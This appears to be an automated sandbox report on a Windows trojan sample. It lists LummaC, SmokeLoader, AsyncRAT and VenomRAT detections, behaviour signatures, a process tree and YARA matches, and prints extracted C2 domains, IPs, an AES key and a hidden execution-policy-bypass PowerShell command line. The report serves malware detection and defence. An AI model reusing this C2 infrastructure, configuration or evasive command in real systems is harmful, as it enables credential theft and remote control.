Edit tour

Windows Analysis Report
FpiUD4nYpj.exe

Overview

General Information

Sample name:	FpiUD4nYpj.exe renamed because original name is a hash value
Original sample name:	8f183d95f41f213f3413f7c59f58241f.exe
Analysis ID:	1483397
MD5:	8f183d95f41f213f3413f7c59f58241f
SHA1:	dc340f7d3cd6c3cafa11c7830ab2c95cf036ad26
SHA256:	2422f7d311683fbb34a9d4bf91ab7891df13efaa003a7ed569467e6e8d9d98cc
Tags:	32exetrojan
Infos:

Detection

LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Check for Windows Defender sandbox

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

System process connects to network (likely due to code injection or exploit)

Yara detected AsyncRAT

Yara detected Go Injector

Yara detected LummaC Stealer

Yara detected SmokeLoader

Yara detected VenomRAT

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Changes memory attributes in foreign processes to executable or writable

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Connects to a pastebin service (likely for C&C)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Creates a thread in another existing process (thread injection)

Creates autostart registry keys with suspicious names

Deletes itself after installation

Drops VBS files to the startup folder

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious ZIP file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Powershell drops PE file

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Reads the Security eventlog

Reads the System eventlog

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

FpiUD4nYpj.exe (PID: 7164 cmdline: "C:\Users\user\Desktop\FpiUD4nYpj.exe" MD5: 8F183D95F41F213F3413F7C59F58241F)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

2FBE.exe (PID: 6044 cmdline: C:\Users\user\AppData\Local\Temp\2FBE.exe MD5: 2B3ECC21382E825D6FE0812A717717EB)

conhost.exe (PID: 2488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

34CA.exe (PID: 6796 cmdline: C:\Users\user\AppData\Local\Temp\34CA.exe MD5: D3785ED170CDB1F4784D3DFF3A61DAE0)

BitLockerToGo.exe (PID: 3588 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

BD9E.exe (PID: 3288 cmdline: C:\Users\user\AppData\Local\Temp\BD9E.exe MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)

BD9E.exe (PID: 3128 cmdline: "C:\Users\user\AppData\Local\Temp\BD9E.exe" -HOSTRUNAS MD5: B6A1C0998D0A7979C9EC17B8D5CF8A81)

powershell.exe (PID: 1696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4852 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

vm.exe (PID: 5804 cmdline: "vm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

cmd.exe (PID: 5576 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

lm.exe (PID: 4936 cmdline: "lm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

WerFault.exe (PID: 5788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 1848 MD5: C31336C1EFC2CCB44B4326EA793040F2)

wscript.exe (PID: 332 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 6972 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vm.exe (PID: 5252 cmdline: "vm.exe" MD5: F1B14F71252DE9AC763DBFBFBFC8C2DC)

WerFault.exe (PID: 412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1128 MD5: C31336C1EFC2CCB44B4326EA793040F2)

2FBE.exe (PID: 2084 cmdline: "C:\Users\user\AppData\Local\Temp\2FBE.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)

conhost.exe (PID: 3900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

2FBE.exe (PID: 4388 cmdline: "C:\Users\user\AppData\Local\Temp\2FBE.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)

conhost.exe (PID: 4452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jjistfr (PID: 5672 cmdline: C:\Users\user\AppData\Roaming\jjistfr MD5: 8F183D95F41F213F3413F7C59F58241F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: LummaC

{"C2 url": ["indexterityszcoxp.shop", "lariatedzugspd.shop", "callosallsaospz.shop", "outpointsozp.shop", "liernessfornicsa.shop", "upknittsoappz.shop", "shepherdlyopzc.shop", "unseaffarignsk.shop"], "Build id": "bOKHNM--"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://mzxn.ru/tmp/index.php", "http://100xmargin.com/tmp/index.php", "http://wgdnb4rc.xyz/tmp/index.php", "http://olinsw.ws/tmp/index.php"]}

Threatname: VenomRAT

{"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null"}

Threatname: AsyncRAT

{"Server": "94.156.79.190,193.222.96.24", "Ports": "4449", "Version": "Venom RAT + HVNC + Stealer + Grabber  v6.0.2", "Autorun": "false", "Install_Folder": "%AppData%", "AES_key": "KSXE50q1aBZS6zviv09LVn6h1agzpC0c", "Mutex": "aqswvfsywrpgi", "Certificate": "MIICLzCCAZigAwIBAgIVAMlWIVjWC1nh9ktodokpLXg1Z7jDMA0GCSqGSIb3DQEBDQUAMGAxGDAWBgNVBAMMD1Zlbm9tUkFUIFNlcnZlcjEOMAwGA1UECwwFVmVub20xGjAYBgNVBAoMEVZlbm9tUkFUIEJ5IFZlbm9tMQswCQYDVQQHDAJTSDELMAkGA1UEBhMCQ04wHhcNMjIwNDIzMDE0ODMzWhcNMzMwMTMwMDE0ODMzWjATMREwDwYDVQQDDAhWZW5vbVJBVDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEApVFyhBoFr/9yziPYmAfupGi+6Dr9HlSEu4y7EX9UWIylw9CS4Voa/+1ncAOzogfrktnFzQ8mi0CRy5KZ/h/xY3W/RZXSOuTiBxwuYJ21ZyP0F3NE0Dk0iKJbBQvE/zmGVU3o0nSQEJ5eKQF9cj8SCsEac4tcpOeJWGRR4EOaNH8CAwEAAaMyMDAwHQYDVR0OBBYEFAXo7kHUsbMm0Un9lzKiyH3ZKuRhMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADgYEAToihy3/hoIiQqRgL8LQs+1ZyJfdHwOCmbsgIXHWfuygpkNuCVgWyx00+6WG1rrFOf0JZMar0D7txlc/bnAasiYPUL5EXEL/uikR3e8zzcQOhRAszKHobjW3VxGBYxClWdkhDZNxoiXTPs53aoby1ddub4dbDXQzIo//fNN30FNc=", "ServerSignature": "WlDXsoQjOeItY/AjpYunYYPwdj7pVZk3AxP9TSMhaMXlTxtOfd/QUD9Td9tdZ/gqN8Mrd7dFRlgi6WvGULUn8oYyaqUlD8bhcaHBCb7iJvzMqGTkJovPSDs+PdIfDJwTAVY/j6J2UDT7B9Hux+AFROKdJXYBG233NvPZNBdQ8Yc=", "BDOS": "null", "External_config_on_Pastebin": "false"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\34CA.exe	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000003.2644907653.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2613784729.000000000300D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000003.2832025974.0000000000613000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2645696277.000000000300D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1964638535.00000000040B1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.1964638535.00000000040B1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1731949971.00000000026F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1731949971.00000000026F0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000D.00000003.2666588683.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1964481125.000000000258D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x73b0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000012.00000002.4106101148.0000000000060000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x13f32:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x17468:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000D.00000003.2632557485.000000000300D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2666017373.0000000003011000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000003.2830110398.0000000000610000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2613300795.000000000300D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2644409478.000000000300D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2631526881.000000000300D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000003.2644907653.000000000300D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000000.2466826859.00007FF65BBF0000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
00000019.00000002.3260078878.0000000006010000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x13f32:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x17468:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000013.00000002.3185231236.0000000003860000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4c92e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4fe64:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000D.00000003.2612260038.000000000300D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1732147386.00000000040B1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1732147386.00000000040B1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
00000000.00000002.1731925508.00000000026E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000013.00000002.3151962784.0000000000060000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x4c92e:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4fe64:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000003.00000002.1964603084.0000000004090000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.1964603084.0000000004090000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1732060091.000000000272D000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7790:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1964408969.0000000002560000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000D.00000003.2645696277.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000019.00000002.3139489097.00000000005C0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x13f32:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x17468:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000D.00000003.2666377646.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2601744896.00007FF65BBF0000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: 34CA.exe PID: 6796	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3588	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3588	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3588	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: vm.exe PID: 5804	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: lm.exe PID: 4936	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: lm.exe PID: 4936	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: vm.exe PID: 5252	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 42 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
18.2.vm.exe.29e0000.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
18.2.vm.exe.29e0000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
18.2.vm.exe.29e0000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
18.2.vm.exe.29e0000.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xda04:$q1: Select * from Win32_CacheMemory 0xda44:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xda92:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdae0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
25.2.vm.exe.4e40000.1.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
25.2.vm.exe.4e40000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xf804:$q1: Select * from Win32_CacheMemory 0xf844:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xf892:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xf8e0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
25.2.vm.exe.4e40000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
25.2.vm.exe.4e40000.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0xda04:$q1: Select * from Win32_CacheMemory 0xda44:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0xda92:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0xdae0:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
8.2.34CA.exe.7ff65b6b0000.6.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
8.0.34CA.exe.7ff65b6b0000.0.unpack	JoeSecurity_GoInjector_2	Yara detected Go Injector	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

